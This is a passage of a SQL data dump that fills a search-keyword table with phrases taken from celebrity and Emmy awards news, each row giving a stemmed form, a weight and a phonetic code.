getty',0,1,1.5333,'D252523',1,'en'),(32531,'djansezian getty photographs','djansezian getty photographs',0,1,1.9333,'D252523132612',1,'en'),(32532,'do ok','do ok',0,1,1.1667,'D200',1,'en'),(32533,'do ok he\'s','do ok he',0,1,1.3333,'D200',1,'en'),(32534,'does win','doe win',0,1,1.2667,'D250',1,'en'),(32535,'does win a','doe win a',0,1,1.3333,'D250',1,'en'),(32536,'domination','domin',0,0,0.6667,'D535',1,'en'),(32537,'domination john','domin john',0,1,1.5,'D53525',1,'en'),(32538,'domination john macmejohn','domin john macmejohn',0,1,1.8333,'D535252525',1,'en'),(32539,'don','don',0,0,0.2,'D500',2,'en'),(32540,'don cheadle','don cheadle',0,1,1.3667,'D5234',1,'en'),(32541,'don cheadle and','don cheadle and',0,1,1.5,'D523453',1,'en'),(32542,'douglas','dougla',0,0,0.4667,'D242',1,'en'),(32543,'douglas remaining','dougla remaining',0,1,1.5667,'D242652',1,'en'),(32544,'douglas remaining luciana','dougla remaining luciana',0,1,1.8333,'D242652425',1,'en'),(32545,'douglas the','dougla the',0,1,1.3667,'D2423',1,'en'),(32546,'douglas the \'behind','dougla the behind',0,1,1.6333,'D2423153',1,'en'),(32547,'dramatic','dramat',0,0,0.5333,'D6532',1,'en'),(32548,'dramatic actress','dramat actress',0,1,1.5333,'D6532362',1,'en'),(32549,'dramatic actress nominee','dramat actress nominee',0,1,1.8,'D65323625',1,'en'),(32550,'dress roger','dress roger',0,1,1.3667,'D62626',1,'en'),(32551,'dress roger vivier','dress roger vivier',0,1,1.6,'D6262616',1,'en'),(32552,'duel','duel',0,0,0.2667,'D400',1,'en'),(32553,'duel between','duel between',0,1,1.4,'D4135',1,'en'),(32554,'duel between \'scandal','duel between scandal',0,1,1.7,'D41352534',1,'en'),(32555,'easy team','easi team',0,1,1.3,'E235',1,'en'),(32556,'easy team it','easi team it',0,1,1.4,'E2353',1,'en'),(32557,'eighth','eighth',0,0,0.4,'E230',1,'en'),(32558,'eighth overall','eighth overall',0,1,1.4667,'E23164',1,'en'),(32559,'eighth overall for','eighth overall for',0,1,1.6,'E2316416',1,'en'),(32560,'else','els',0,0,0.2667,'E420',2,'en'),(32561,'else could','els could',0,1,1.3333,'E4243',1,'en'),(32562,'else could kevork','els could kevork',0,1,1.5667,'E42432162',1,'en'),(32563,'emmy','emmi',0,0,0.2667,'E500',1,'en'),(32564,'emmy accolades','emmi accolades',0,1,1.4667,'E52432',1,'en'),(32565,'emmy accolades the','emmi accolades the',0,1,1.6,'E524323',1,'en'),(32566,'emmy awards','emmi awards',0,1,1.3667,'E5632',1,'en'),(32567,'emmy awards douglas','emmi awards douglas',0,1,1.6333,'E56323242',1,'en'),(32568,'emmy awards red','emmi awards red',0,1,1.5,'E563263',1,'en'),(32569,'emmy for','emmi for',0,1,1.2667,'E516',1,'en'),(32570,'emmy for tremendous','emmi for tremendous',0,1,1.6333,'E51636532',1,'en'),(32571,'emmy gifts','emmi gifts',0,1,1.3333,'E52132',1,'en'),(32572,'emmy gifts that','emmi gifts that',0,1,1.5,'E521323',1,'en'),(32573,'emmy winner','emmi winner',0,1,1.3667,'E560',1,'en'),(32574,'emmy winner this','emmi winner this',0,1,1.5333,'E5632',1,'en'),(32575,'enjoy travelling','enjoi travelling',0,1,1.5333,'E52361452',1,'en'),(32576,'enjoy travelling to','enjoi travelling to',0,1,1.6333,'E523614523',1,'en'),(32577,'event the emmy','event the emmy',0,1,1.4667,'E1535',1,'en'),(32578,'ever expected','ever expected',0,1,1.4333,'E162123',1,'en'),(32579,'ever expected anything','ever expected anything',0,1,1.7333,'E1621235352',1,'en'),(32580,'ever felt','ever felt',0,1,1.3,'E16143',1,'en'),(32581,'ever felt he','ever felt he',0,1,1.4,'E16143',1,'en'),(32582,'everybody','everybodi',0,0,0.6,'E1613',1,'en'),(32583,'everybody may','everybodi may',0,1,1.4333,'E16135',1,'en'),(32584,'everybody may be','everybodi may be',0,1,1.5333,'E161351',1,'en'),(32585,'excited','excit',0,0,0.4667,'E230',2,'en'),(32586,'excited when','excit when',0,1,1.4,'E235',1,'en'),(32587,'excited when they','excit when they',0,1,1.5667,'E2353',1,'en'),(32588,'expected anything','expect anything',0,1,1.5667,'E21235352',1,'en'),(32589,'expected anything before','expect anything before',0,1,1.8,'E2123535216',1,'en'),(32590,'experienced','experienc',0,0,0.7333,'E216523',1,'en'),(32591,'experienced person','experienc person',0,1,1.6,'E2165231625',1,'en'),(32592,'experienced person at','experienc person at',0,1,1.7,'E21652316253',1,'en'),(32593,'extra this','extra this',0,1,1.3333,'E23632',1,'en'),(32594,'extra this year','extra this year',0,1,1.5,'E236326',1,'en'),(32595,'extremely','extrem',0,0,0.6,'E23654',2,'en'),(32596,'extremely diplomatic','extrem diplomatic',0,1,1.6667,'E23654314532',1,'en'),(32597,'extremely diplomatic best','extrem diplomatic best',0,1,1.8333,'E23654314532123',1,'en'),(32598,'fact a','fact a',0,1,1.2,'F230',1,'en'),(32599,'fact a locosounds','fact a locosounds',0,1,1.5667,'F2342532',1,'en'),(32600,'fans get','fan get',0,1,1.2667,'F523',1,'en'),(32601,'fans get excited','fan get excited',0,1,1.5333,'F52323',1,'en'),(32602,'fans i','fan i',0,1,1.2,'F520',1,'en'),(32603,'fans i think','fan i think',0,1,1.4,'F52352',1,'en'),(32604,'father','father',0,0,0.4,'F360',1,'en'),(32605,'father lester','father lester',0,1,1.4333,'F364236',1,'en'),(32606,'father lester patinkin','father lester patinkin',0,1,1.7333,'F36423613525',1,'en'),(32607,'fear','fear',0,0,0.2667,'F600',1,'en'),(32608,'fear john','fear john',0,1,1.3,'F625',1,'en'),(32609,'fear john macmeserta','fear john macmeserta',0,1,1.6667,'F62525263',1,'en'),(32610,'feel like','feel like',0,1,1.3,'F420',1,'en'),(32611,'feel like these','feel like these',0,1,1.5,'F4232',1,'en'),(32612,'feel yourself','feel yourself',0,1,1.4333,'F46241',1,'en'),(32613,'feel yourself to','feel yourself to',0,1,1.5333,'F462413',1,'en'),(32614,'felt','felt',0,0,0.2667,'F430',2,'en'),(32615,'felt he','felt he',0,1,1.2333,'F430',1,'en'),(32616,'felt he was','felt he was',0,1,1.3667,'F432',1,'en'),(32617,'felt when','felt when',0,1,1.3,'F435',1,'en'),(32618,'felt when i','felt when i',0,1,1.3667,'F435',1,'en'),(32619,'fey','fei',0,0,0.2,'F000',1,'en'),(32620,'fey placing','fei placing',0,1,1.3667,'F4252',1,'en'),(32621,'fey placing on','fei placing on',0,1,1.4667,'F42525',1,'en'),(32622,'fey supposed','fei supposed',0,1,1.4,'F2123',1,'en'),(32623,'fey supposed and','fei supposed and',0,1,1.5333,'F212353',1,'en'),(32624,'first owner','first owner',0,1,1.3667,'F62356',1,'en'),(32625,'first owner had','first owner had',0,1,1.5,'F623563',1,'en'),(32626,'first was','first was',0,1,1.3,'F6232',1,'en'),(32627,'first was possessing','first was possessing',0,1,1.6667,'F62321252',1,'en'),(32628,'fleeting','fleet',0,0,0.5333,'F4352',1,'en'),(32629,'fleeting and','fleet and',0,1,1.4,'F435253',1,'en'),(32630,'fleeting and the','fleet and the',0,1,1.5333,'F435253',1,'en'),(32631,'floor','floor',0,0,0.3333,'F460',3,'en'),(32632,'floor it','floor it',0,1,1.2667,'F463',1,'en'),(32633,'floor it was','floor it was',0,1,1.4,'F4632',1,'en'),(32634,'following about','follow about',0,1,1.5,'F45213',1,'en'),(32635,'following about life','follow about life',0,1,1.6667,'F4521341',1,'en'),(32636,'for 2013.kerry','for 2013.kerry',0,1,1.4667,'F626',1,'en'),(32637,'for 2013.kerry california','for 2013.kerry california',0,1,1.8333,'F62624165',1,'en'),(32638,'for an arrival','for an arrival',0,1,1.4667,'F65614',1,'en'),(32639,'for devoted','for devoted',0,1,1.3667,'F6313',1,'en'),(32640,'for devoted fans','for devoted fans',0,1,1.5333,'F6313152',1,'en'),(32641,'for great','for great',0,1,1.3,'F6263',1,'en'),(32642,'for great years','for great years',0,1,1.5,'F626362',1,'en'),(32643,'for the hit','for the hit',0,1,1.3667,'F630',1,'en'),(32644,'for tremendous','for tremendous',0,1,1.4667,'F636532',1,'en'),(32645,'for tremendous writing','for tremendous writing',0,1,1.7333,'F6365326352',1,'en'),(32646,'for us','for us',0,1,1.2,'F620',1,'en'),(32647,'for us our','for us our',0,1,1.3333,'F626',1,'en'),(32648,'for years','for years',0,1,1.3,'F620',1,'en'),(32649,'for years this','for years this',0,1,1.4667,'F6232',1,'en'),(32650,'fortuitous','fortuit',0,0,0.6667,'F632',1,'en'),(32651,'fortuitous two','fortuit two',0,1,1.4667,'F6323',1,'en'),(32652,'fortuitous two amazing','fortuit two amazing',0,1,1.7333,'F63235252',1,'en'),(32653,'fox returns','fox returns',0,1,1.3667,'F263652',1,'en'),(32654,'fox returns to','fox returns to',0,1,1.4667,'F2636523',1,'en'),(32655,'francis underwood','franci underwood',0,1,1.5667,'F6525363',1,'en'),(32656,'francis underwood kevin','franci underwood kevin',0,1,1.7667,'F6525363215',1,'en'),(32657,'fred','fred',0,0,0.2667,'F630',1,'en'),(32658,'fred leighton','fred leighton',0,1,1.4333,'F634235',1,'en'),(32659,'fred leighton jewels','fred leighton jewels',0,1,1.6667,'F634235242',1,'en'),(32660,'fred leighton picked','fred leighton picked',0,1,1.6667,'F634235123',1,'en'),(32661,'freer','freer',0,0,0.3333,'F600',1,'en'),(32662,'freer a','freer a',0,1,1.2333,'F600',1,'en'),(32663,'freer a core','freer a core',0,1,1.4,'F626',1,'en'),(32664,'friends','friend',0,0,0.4667,'F6532',2,'en'),(32665,'friends at','friend at',0,1,1.3333,'F65323',1,'en'),(32666,'friends at nbc','friend at nbc',0,1,1.4667,'F65323512',1,'en'),(32667,'from \'house','from house',0,1,1.3667,'F652',1,'en'),(32668,'from \'house of','from house of',0,1,1.4667,'F6521',1,'en'),(32669,'from fred','from fred',0,1,1.3,'F65163',1,'en'),(32670,'from fred leighton','from fred leighton',0,1,1.6,'F651634235',1,'en'),(32671,'fun','fun',0,0,0.2,'F500',1,'en'),(32672,'fun to','fun to',0,1,1.2,'F530',1,'en'),(32673,'fun to be','fun to be',0,1,1.3,'F531',1,'en'),(32674,'gallery and','galleri and',0,1,1.3667,'G4653',1,'en'),(32675,'gallery and eighth','galleri and eighth',0,1,1.6,'G465323',1,'en'),(32676,'get excited','get excited',0,1,1.3667,'G323',1,'en'),(32677,'get excited when','get excited when',0,1,1.5333,'G3235',1,'en'),(32678,'get to','get to',0,1,1.2,'G300',2,'en'),(32679,'get to come','get to come',0,1,1.3667,'G325',1,'en'),(32680,'getting married','get married',0,1,1.5,'G352563',1,'en'),(32681,'getting married to','get married to',0,1,1.6,'G352563',1,'en'),(32682,'getty','getti',0,0,0.3333,'G300',1,'en'),(32683,'getty photographs','getti photographs',0,1,1.5667,'G3132612',1,'en'),(32684,'gifts','gift',0,0,0.3333,'G132',1,'en'),(32685,'gifts that','gift that',0,1,1.3333,'G1323',1,'en'),(32686,'gifts that produced','gift that produced',0,1,1.6333,'G132316323',1,'en'),(32687,'global','global',0,0,0.4,'G414',1,'en'),(32688,'global domination','global domination',0,1,1.5667,'G4143535',1,'en'),(32689,'global domination john','global domination john',0,1,1.7333,'G414353525',1,'en'),(32690,'going into','go into',0,1,1.3333,'G5253',1,'en'),(32691,'going into its','go into its',0,1,1.4667,'G52532',1,'en'),(32692,'got cancer','got cancer',0,1,1.3333,'G32526',1,'en'),(32693,'got cancer the','got cancer the',0,1,1.4667,'G325263',1,'en'),(32694,'got them','got them',0,1,1.2667,'G350',1,'en'),(32695,'got them to','got them to',0,1,1.3667,'G353',1,'en'),(32696,'got up','got up',0,1,1.2,'G310',1,'en'),(32697,'got up there','got up there',0,1,1.4,'G3136',1,'en'),(32698,'gratitude','gratitud',0,0,0.6,'G630',1,'en'),(32699,'gratitude for','gratitud for',0,1,1.4333,'G6316',1,'en'),(32700,'gratitude for the','gratitud for the',0,1,1.5667,'G63163',1,'en'),(32701,'gratitude just','gratitud just',0,1,1.4667,'G6323',1,'en'),(32702,'gratitude just extra','gratitud just extra',0,1,1.6667,'G6323236',1,'en'),(32703,'great years','great years',0,1,1.3667,'G6362',1,'en'),(32704,'great years on','great years on',0,1,1.4667,'G63625',1,'en'),(32705,'greater numbers','greater numbers',0,1,1.5,'G6365162',1,'en'),(32706,'greater numbers of','greater numbers of',0,1,1.6,'G63651621',1,'en'),(32707,'gut','gut',0,0,0.2,'G300',1,'en'),(32708,'gut it','gut it',0,1,1.2,'G300',1,'en'),(32709,'gut it really','gut it really',0,1,1.4333,'G364',1,'en'),(32710,'gym','gym',0,0,0.2,'G500',1,'en'),(32711,'gym floor','gym floor',0,1,1.3,'G5146',1,'en'),(32712,'gym floor it','gym floor it',0,1,1.4,'G51463',1,'en'),(32713,'had babies','had babies',0,1,1.3333,'H312',1,'en'),(32714,'had babies by','had babies by',0,1,1.4333,'H3121',1,'en'),(32715,'hand arrives','hand arrives',0,1,1.4,'H53612',1,'en'),(32716,'hand arrives along','hand arrives along',0,1,1.6,'H53612452',1,'en'),(32717,'happened after','happen after',0,1,1.4667,'H153136',1,'en'),(32718,'happened after got','happen after got',0,1,1.6,'H15313623',1,'en'),(32719,'happy to','happi to',0,1,1.2667,'H130',1,'en'),(32720,'happy to be','happi to be',0,1,1.3667,'H131',1,'en'),(32721,'hardcore','hardcor',0,0,0.5333,'H6326',1,'en'),(32722,'hardcore comedy','hardcor comedy',0,1,1.5,'H6326253',1,'en'),(32723,'hardcore comedy fans','hardcor comedy fans',0,1,1.6667,'H6326253152',1,'en'),(32724,'harder','harder',0,0,0.4,'H636',1,'en'),(32725,'harder and','harder and',0,1,1.3333,'H63653',1,'en'),(32726,'harder and tivo','harder and tivo',0,1,1.5,'H636531',1,'en'),(32727,'has only','ha only',0,1,1.2667,'H254',1,'en'),(32728,'has only gratitude','ha only gratitude',0,1,1.6,'H254263',1,'en'),(32729,'has turned','ha turned',0,1,1.3333,'H23653',1,'en'),(32730,'has turned into','ha turned into',0,1,1.5,'H2365353',1,'en'),(32731,'he can\'t','he can',0,1,1.2667,'H253',1,'en'),(32732,'he can\'t wait','he can wait',0,1,1.4333,'H253',1,'en'),(32733,'he made','he made',0,1,1.2333,'H530',1,'en'),(32734,'he made years','he made years',0,1,1.4333,'H5362',1,'en'),(32735,'he\'s','he',0,0,0.2667,'H200',3,'en'),(32736,'he\'s happy','he happy',0,1,1.3333,'H210',1,'en'),(32737,'he\'s happy to','he happy to',0,1,1.4333,'H213',1,'en'),(32738,'heels','heel',0,0,0.3333,'H420',1,'en'),(32739,'heels and','heel and',0,1,1.3,'H4253',1,'en'),(32740,'heels and clutch','heel and clutch',0,1,1.5333,'H42532432',1,'en'),(32741,'her and','her and',0,1,1.2333,'H653',1,'en'),(32742,'her and thought','her and thought',0,1,1.5,'H65323',1,'en'),(32743,'her husband','her husband',0,1,1.3667,'H62153',1,'en'),(32744,'her husband matt','her husband matt',0,1,1.5333,'H6215353',1,'en'),(32745,'here with','here with',0,1,1.3,'H630',1,'en'),(32746,'here with my','here with my',0,1,1.4,'H635',1,'en'),(32747,'him a','him a',0,1,1.1667,'H500',1,'en'),(32748,'him a star','him a star',0,1,1.3333,'H5236',1,'en'),(32749,'him i','him i',0,1,1.1667,'H500',1,'en'),(32750,'him i am','him i am',0,1,1.2667,'H500',1,'en'),(32751,'his win','hi win',0,1,1.2333,'H250',1,'en'),(32752,'his win not','hi win not',0,1,1.3667,'H253',1,'en'),(32753,'hit comedy','hit comedy',0,1,1.3333,'H3253',1,'en'),(32754,'hit comedy that','hit comedy that',0,1,1.5,'H3253',1,'en'),(32755,'hit me','hit me',0,1,1.2,'H350',1,'en'),(32756,'hit me within','hit me within',0,1,1.4333,'H3535',1,'en'),(32757,'homeland','homeland',0,0,0.5333,'H5453',1,'en'),(32758,'homeland set','homeland set',0,1,1.4,'H545323',1,'en'),(32759,'homeland set is','homeland set is',0,1,1.5,'H5453232',1,'en'),(32760,'how demonstrative','how demonstrative',0,1,1.5667,'H3523631',1,'en'),(32761,'how demonstrative i','how demonstrative i',0,1,1.6333,'H3523631',1,'en'),(32762,'husband','husband',0,0,0.4667,'H2153',1,'en'),(32763,'husband matt','husband matt',0,1,1.4,'H215353',1,'en'),(32764,'husband matt damon','husband matt damon',0,1,1.6,'H2153535',1,'en'),(32765,'i am an','i am an',0,1,1.2333,'I500',1,'en'),(32766,'i enjoy','i enjoy',0,1,1.2333,'I520',1,'en'),(32767,'i enjoy travelling','i enjoy travelling',0,1,1.6,'I52361452',1,'en'),(32768,'i ever','i ever',0,1,1.2,'I160',1,'en'),(32769,'i ever expected','i ever expected',0,1,1.5,'I162123',1,'en'),(32770,'i felt','i felt',0,1,1.2,'I143',1,'en'),(32771,'i felt when','i felt when',0,1,1.3667,'I1435',1,'en'),(32772,'i got','i got',0,1,1.1667,'I230',1,'en'),(32773,'i got up','i got up',0,1,1.2667,'I231',1,'en'),(32774,'i just','i just',0,1,1.2,'I230',1,'en'),(32775,'i just feel','i just feel',0,1,1.3667,'I2314',1,'en'),(32776,'i looked','i looked',0,1,1.2667,'I423',1,'en'),(32777,'i looked at','i looked at',0,1,1.3667,'I423',1,'en'),(32778,'i must','i must',0,1,1.2,'I523',1,'en'),(32779,'i must do','i must do',0,1,1.3,'I523',1,'en'),(32780,'i noticed this','i noticed this',0,1,1.4667,'I53232',1,'en'),(32781,'i rocked','i rocked',0,1,1.2667,'I623',1,'en'),(32782,'i rocked claire\'s','i rocked claire',0,1,1.5667,'I6232462',1,'en'),(32783,'i think hardcore','i think hardcore',0,1,1.5333,'I3526326',1,'en'),(32784,'i think they','i think they',0,1,1.4,'I3523',1,'en'),(32785,'i was struck','i was struck',0,1,1.4,'I2362',1,'en'),(32786,'i was very','i was very',0,1,1.3333,'I216',1,'en'),(32787,'i\'m not','i not',0,1,1.2333,'I530',1,'en'),(32788,'i\'m not sure','i not sure',0,1,1.4,'I5326',1,'en'),(32789,'i\'ve','i',0,0,0.2667,'I100',1,'en'),(32790,'i\'ve ever','i ever',0,1,1.3,'I160',1,'en'),(32791,'i\'ve ever felt','i ever felt',0,1,1.4667,'I16143',1,'en'),(32792,'i\'ve known','i known',0,1,1.3333,'I125',1,'en'),(32793,'i\'ve known for','i known for',0,1,1.4667,'I12516',1,'en'),(32794,'if that\'s','if that',0,1,1.3,'I132',1,'en'),(32795,'if that\'s because','if that because',0,1,1.5667,'I13212',1,'en'),(32796,'in a comedy','in a comedy',0,1,1.3667,'I5253',1,'en'),(32797,'in a miniseries','in a miniseries',0,1,1.5,'I5262',1,'en'),(32798,'in fact','in fact',0,1,1.2333,'I5123',2,'en'),(32799,'in fact a','in fact a',0,1,1.3,'I5123',1,'en'),(32800,'in marchesa','in marchesa',0,1,1.3667,'I562',1,'en'),(32801,'in marchesa and','in marchesa and',0,1,1.5,'I56253',1,'en'),(32802,'in the vehicle','in the vehicle',0,1,1.4667,'I53124',1,'en'),(32803,'into account','into account',0,1,1.4,'I53253',1,'en'),(32804,'into account a','into account a',0,1,1.4667,'I53253',1,'en'),(32805,'into baby','into baby',0,1,1.3,'I531',1,'en'),(32806,'into baby central','into baby central',0,1,1.5667,'I53125364',1,'en'),(32807,'into its','into its',0,1,1.2667,'I532',1,'en'),(32808,'into its seventh','into its seventh',0,1,1.5333,'I532153',1,'en'),(32809,'is going','is going',0,1,1.2667,'I252',1,'en'),(32810,'is going into','is going into',0,1,1.4333,'I25253',1,'en'),(32811,'is in','is in',0,1,1.1667,'I250',2,'en'),(32812,'is in fact','is in fact',0,1,1.3333,'I25123',1,'en'),(32813,'is really','is really',0,1,1.3,'I264',1,'en'),(32814,'is really touching','is really touching',0,1,1.6,'I2643252',1,'en'),(32815,'it i\'m','it i',0,1,1.2,'I350',1,'en'),(32816,'it i\'m not','it i not',0,1,1.3333,'I353',1,'en'),(32817,'it really amazed','it really amazed',0,1,1.5333,'I364523',1,'en'),(32818,'it reverse','it reverse',0,1,1.3333,'I36162',1,'en'),(32819,'it reverse john','it reverse john',0,1,1.5,'I361625',1,'en'),(32820,'it was an','it was an',0,1,1.3,'I325',1,'en'),(32821,'it will','it will',0,1,1.2333,'I340',1,'en'),(32822,'it will be','it will be',0,1,1.3333,'I341',1,'en'),(32823,'it\'s a whole','it a whole',0,1,1.4,'I324',1,'en'),(32824,'it\'s fun','it fun',0,1,1.2667,'I3215',1,'en'),(32825,'it\'s fun to','it fun to',0,1,1.3667,'I32153',1,'en'),(32826,'its seventh','it seventh',0,1,1.3667,'I32153',1,'en'),(32827,'its seventh season','it seventh season',0,1,1.6,'I3215325',1,'en'),(32828,'j fox','j fox',0,1,1.1667,'J120',1,'en'),(32829,'j fox returns','j fox returns',0,1,1.4333,'J1263652',1,'en'),(32830,'jewellery','jewelleri',0,0,0.6,'J460',2,'en'),(32831,'jewellery from','jewelleri from',0,1,1.4667,'J46165',1,'en'),(32832,'jewellery from fred','jewelleri from fred',0,1,1.6333,'J46165163',1,'en'),(32833,'jewels','jewel',0,0,0.4,'J420',1,'en'),(32834,'jewels didn','jewel didn',0,1,1.3667,'J4235',1,'en'),(32835,'jewels didn offer','jewel didn offer',0,1,1.5667,'J423516',1,'en'),(32836,'john macmejohn','john macmejohn',0,1,1.4667,'J52525',1,'en'),(32837,'john macmejohn united','john macmejohn united',0,1,1.7,'J525253',1,'en'),(32838,'john macmeserta','john macmeserta',0,1,1.5,'J525263',1,'en'),(32839,'john macmeserta market','john macmeserta market',0,1,1.7333,'J5252635623',1,'en'),(32840,'john macmeserta united','john macmeserta united',0,1,1.7333,'J52526353',1,'en'),(32841,'john macmeserta usa','john macmeserta usa',0,1,1.6333,'J5252632',1,'en'),(32842,'just extra','just extra',0,1,1.3333,'J3236',1,'en'),(32843,'just extra this','just extra this',0,1,1.5,'J323632',1,'en'),(32844,'just feel','just feel',0,1,1.3,'J314',1,'en'),(32845,'just feel like','just feel like',0,1,1.4667,'J3142',1,'en'),(32846,'just hit','just hit',0,1,1.2667,'J300',1,'en'),(32847,'just hit me','just hit me',0,1,1.3667,'J350',1,'en'),(32848,'kevin','kevin',0,0,0.3333,'K150',1,'en'),(32849,'kevin spacey','kevin spacey',0,1,1.4,'K15212',1,'en'),(32850,'kevin spacey a','kevin spacey a',0,1,1.4667,'K15212',1,'en'),(32851,'kevork','kevork',0,0,0.4,'K162',1,'en'),(32852,'kevork djansezian','kevork djansezian',0,1,1.5667,'K16232525',1,'en'),(32853,'kevork djansezian getty','kevork djansezian getty',0,1,1.7667,'K1623252523',1,'en'),(32854,'kind of don','kind of don',0,1,1.3667,'K53135',1,'en'),(32855,'known for','known for',0,1,1.3,'K516',1,'en'),(32856,'known for years','known for years',0,1,1.5,'K5162',1,'en'),(32857,'labor','labor',0,0,0.3333,'L160',1,'en'),(32858,'labor of','labor of',0,1,1.2667,'L161',1,'en'),(32859,'labor of affection','labor of affection',0,1,1.6,'L161235',1,'en'),(32860,'lauren uk second','lauren uk second',0,1,1.5333,'L65253',1,'en'),(32861,'lead','lead',0,0,0.2667,'L300',4,'en'),(32862,'lead actor','lead actor',0,1,1.3333,'L3236',1,'en'),(32863,'lead actor in','lead actor in',0,1,1.4333,'L32365',1,'en'),(32864,'lead comedic','lead comedic',0,1,1.4,'L32532',1,'en'),(32865,'lead comedic actor','lead comedic actor',0,1,1.6,'L3253236',1,'en'),(32866,'leighton','leighton',0,0,0.5333,'L235',1,'en'),(32867,'leighton jewels','leighton jewels',0,1,1.5,'L235242',1,'en'),(32868,'leighton jewels didn','leighton jewels didn',0,1,1.6667,'L23524235',1,'en'),(32869,'leighton picked','leighton picked',0,1,1.5,'L235123',1,'en'),(32870,'leighton picked up','leighton picked up',0,1,1.6,'L2351231',1,'en'),(32871,'lester','lester',0,0,0.4,'L236',1,'en'),(32872,'lester patinkin','lester patinkin',0,1,1.5,'L23613525',1,'en'),(32873,'lester patinkin at','lester patinkin at',0,1,1.6,'L236135253',1,'en'),(32874,'life after','life after',0,1,1.3333,'L136',1,'en'),(32875,'life after cancer','life after cancer',0,1,1.5667,'L1362526',1,'en'),(32876,'life sections','life sections',0,1,1.4333,'L12352',1,'en'),(32877,'life sections cheap','life sections cheap',0,1,1.6333,'L123521',1,'en'),(32878,'like these','like these',0,1,1.3333,'L232',1,'en'),(32879,'like these things','like these things',0,1,1.5667,'L232352',1,'en'),(32880,'little harder','littl harder',0,1,1.4333,'L34636',1,'en'),(32881,'little harder and','littl harder and',0,1,1.5667,'L3463653',1,'en'),(32882,'locosounds','locosound',0,0,0.6667,'L2532',2,'en'),(32883,'locosounds daycare','locosound daycare',0,1,1.6,'L2532326',1,'en'),(32884,'locosounds daycare center','locosound daycare center',0,1,1.8333,'L25323262536',1,'en'),(32885,'looked','look',0,0,0.4,'L230',2,'en'),(32886,'looked at','look at',0,1,1.3,'L230',1,'en'),(32887,'looked at her','look at her',0,1,1.4333,'L236',1,'en'),(32888,'lot freer','lot freer',0,1,1.3,'L316',1,'en'),(32889,'lot freer a','lot freer a',0,1,1.3667,'L316',1,'en'),(32890,'love affairs','love affairs',0,1,1.4,'L162',1,'en'),(32891,'love affairs because','love affairs because',0,1,1.6667,'L16212',1,'en'),(32892,'loving','love',0,0,0.4,'L152',1,'en'),(32893,'loving and','love and',0,1,1.3333,'L15253',1,'en'),(32894,'loving and fortuitous','love and fortuitous',0,1,1.7,'L152531632',1,'en'),(32895,'luciana','luciana',0,0,0.4667,'L250',1,'en'),(32896,'luciana barroso','luciana barroso',0,1,1.5,'L25162',1,'en'),(32897,'luciana barroso and','luciana barroso and',0,1,1.6333,'L2516253',1,'en'),(32898,'luckily','luckili',0,0,0.4667,'L240',1,'en'),(32899,'luckily for','luckili for',0,1,1.3667,'L2416',1,'en'),(32900,'luckily for us','luckili for us',0,1,1.4667,'L24162',1,'en'),(32901,'macmedan','macmedan',0,0,0.5333,'M2535',1,'en'),(32902,'macmedan america','macmedan america',0,1,1.5333,'M253562',1,'en'),(32903,'macmedan america todaymandy','macmedan america todaymandy',0,1,1.9,'M253562353',1,'en'),(32904,'macmejohn','macmejohn',0,0,0.6,'M2525',1,'en'),(32905,'macmejohn united','macmejohn united',0,1,1.5333,'M25253',1,'en'),(32906,'macmejohn united states','macmejohn united states',0,1,1.7667,'M25253232',1,'en'),(32907,'macmeserta','macmeserta',0,0,0.6667,'M25263',1,'en'),(32908,'macmeserta market','macmeserta market',0,1,1.5667,'M252635623',1,'en'),(32909,'macmeserta market todaymichael','macmeserta market todaymichael',0,1,2,'M252635623524',1,'en'),(32910,'macmeserta united','macmeserta united',0,1,1.5667,'M2526353',1,'en'),(32911,'macmeserta united states','macmeserta united states',0,1,1.8,'M2526353232',1,'en'),(32912,'macmeserta usa','macmeserta usa',0,1,1.4667,'M252632',1,'en'),(32913,'macmeserta usa todayjim','macmeserta usa todayjim',0,1,1.7667,'M252632325',1,'en'),(32914,'made him','made him',0,1,1.2667,'M350',1,'en'),(32915,'made him a','made him a',0,1,1.3333,'M350',1,'en'),(32916,'made years','made years',0,1,1.3333,'M362',1,'en'),(32917,'made years ago','made years ago',0,1,1.4667,'M362',1,'en'),(32918,'makes them','make them',0,1,1.3333,'M235',1,'en'),(32919,'makes them pay','make them pay',0,1,1.4667,'M2351',1,'en'),(32920,'management nominations','manag nominations',0,1,1.7333,'M2535352',1,'en'),(32921,'management nominations came','manag nominations came',0,1,1.9,'M25353525',1,'en'),(32922,'marchesa','marchesa',0,0,0.5333,'M620',1,'en'),(32923,'marchesa and','marchesa and',0,1,1.4,'M6253',1,'en'),(32924,'marchesa and fred','marchesa and fred',0,1,1.5667,'M6253163',1,'en'),(32925,'market todaymichael','market todaymichael',0,1,1.6333,'M623524',1,'en'),(32926,'market todaymichael douglas','market todaymichael douglas',0,1,1.9,'M6235243242',1,'en'),(32927,'married','marri',0,0,0.4667,'M630',1,'en'),(32928,'married to','marri to',0,1,1.3333,'M630',1,'en'),(32929,'married to actress','marri to actress',0,1,1.6,'M632362',1,'en'),(32930,'matt','matt',0,0,0.2667,'M300',1,'en'),(32931,'matt damon','matt damon',0,1,1.3333,'M350',1,'en'),(32932,'matt damon reach','matt damon reach',0,1,1.5333,'M3562',1,'en'),(32933,'may be people','mai be people',0,1,1.4333,'M140',1,'en'),(32934,'me i','me i',0,1,1.1333,'M000',2,'en'),(32935,'me i was','me i was',0,1,1.2667,'M200',1,'en'),(32936,'me on','me on',0,1,1.1667,'M000',1,'en'),(32937,'me on a','me on a',0,1,1.2333,'M000',1,'en'),(32938,'me within','me within',0,1,1.3,'M350',1,'en'),(32939,'me within a','me within a',0,1,1.3667,'M350',1,'en'),(32940,'means they','mean they',0,1,1.3333,'M230',1,'en'),(32941,'means they are','mean they are',0,1,1.4667,'M236',1,'en'),(32942,'miniseries','miniseri',0,0,0.6667,'M262',1,'en'),(32943,'miniseries or','miniseri or',0,1,1.4333,'M2626',1,'en'),(32944,'miniseries or movie','miniseri or movie',0,1,1.6333,'M262651',1,'en'),(32945,'morena','morena',0,0,0.4,'M650',1,'en'),(32946,'morena baccarin','morena baccarin',0,1,1.5,'M651265',1,'en'),(32947,'morena baccarin claire','morena baccarin claire',0,1,1.7333,'M651265246',1,'en'),(32948,'most preferred','most preferred',0,1,1.4667,'M2316163',1,'en'),(32949,'most preferred gallery','most preferred gallery',0,1,1.7333,'M2316163246',1,'en'),(32950,'most taken','most taken',0,1,1.3333,'M2325',1,'en'),(32951,'most taken aback','most taken aback',0,1,1.5333,'M232512',1,'en'),(32952,'movie winner','movi winner',0,1,1.4,'M156',1,'en'),(32953,'movie winner says','movi winner says',0,1,1.5667,'M1562',1,'en'),(32954,'must do','must do',0,1,1.2333,'M230',1,'en'),(32955,'must do ok','must do 